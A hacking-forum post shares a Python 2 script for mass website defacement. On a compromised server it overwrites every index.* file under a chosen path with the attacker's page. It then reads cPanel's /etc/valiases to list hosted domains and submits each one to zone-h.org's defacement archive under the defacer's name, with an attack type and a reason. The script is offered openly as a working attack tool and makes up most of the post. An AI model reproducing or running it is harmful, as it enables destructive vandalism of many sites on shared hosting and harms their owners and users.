Jump to content
The Dev!L

mass Defacement & register in zone-h

Recommended Posts

Posted

hi all ..

i made this script to do a mass defacment and registe the domain of server in zone-h ..

any error just tell me ..


######################################################
# [^| This Code By sA^DeV!L (http://cc.7rs.org)|^] #
# [Defacment & register in zone-h.rog] #
######################################################
print """
.:
.' :
/ :
--' /
\/ />/
/ <//_\
__/ /
)'-. /
./ :\
/.' '
d" '/'
d" YaP8 +
8.aPa P '
d" "P".P `.
8.aPa"P.-"-
a8" "P".P ( |
8 .aPP P .-' '.
"8P" ( (. )8:
a8" . / (_ )
8 .aPP _. :(. )8P `
"8P ( `-' ( `. .
a8" . : ( .a8a)
8 .aP /_`( "a `a. )"'
"8P" (/ _. ' )=='
a8" ( ) .8" +
8 .aP" (`'8a.(:_((.
"8P" ..-. `8P ) ` ) +
a8" -' ( -ab: )
8 .aP ' _ ` (8P"Ya
"8P ( ( )b -`. ) +
a8" 8) ( _.aP" _a \( *
8 .aPPa )/ (8P (88 ) *
"8P" .8 (a:f " `"
"""
print """
######################################################
# [Special Thank to His0k4 & SarBoT511] #
# [^| This Code By sA^DeV!L |^] #
# [Defacment & register in zone-h.rog] #
######################################################
"""
import os
import time
import urllib
import httplib

bass11 = raw_input("\nEnter the path of your Index \n");
bass22 = raw_input("\nEnter you name of your Index \n");
print "\n[$] Defacing..."
print "relax and enjoy your ride :)"
print "!!! ignore all the messages !!!"
execute = "find %s -name \"index.*\" -exec cp %s {} \;" % (bass11, bass22)
os.system(execute)

print """
-------------------------------------------------
| [*] Attack Type : |
| 1-known vulnerability (i.e. unpatched system) |
| 2-undisclosed (new) vulnerability |
| 3-configuration / admin. mistake |
| 4-brute force attack |
| 5-social engineering |
-------------------------------------------------
"""
at=raw_input("[*] Attack Type is: ")
at=int(at)

print """
---------------------------------------------------
| [*] Reason : |
| 1-Heh...just for fun! |
| 2-Revenge against that website |
| 3-Political reasons |
| 4-As a challenge |
---------------------------------------------------
"""
ar=raw_input("[*] Attack Reason is: ")
ar=int(ar)
notifier=raw_input("[*] Name is: ")
os.system("ls /etc/valiases>list.txt")
print"There is a list of the site server if the server cpanel 'list.txt' Enter list.txt in next choise ^_^ "
time.sleep(3)
sites=raw_input("[*] Enter List of your site : \n")
infile = file(sites, 'r')
for site in infile.readlines():

params = urllib.urlencode({'defacer': '%s' %notifier, 'domain': 'http%3A%2F%2F'+site, 'hackmode': '%d' %ar, 'reason': '%d' %at})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml"}
conn = httplib.HTTPConnection("zone-h.org:80")
conn.request("POST", "/notify/single", params, headers)
response = conn.getresponse()
print "[x] Registring site : "+site
conn.close()

print "[x] Registration Done"
#!/usr/bin/python

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...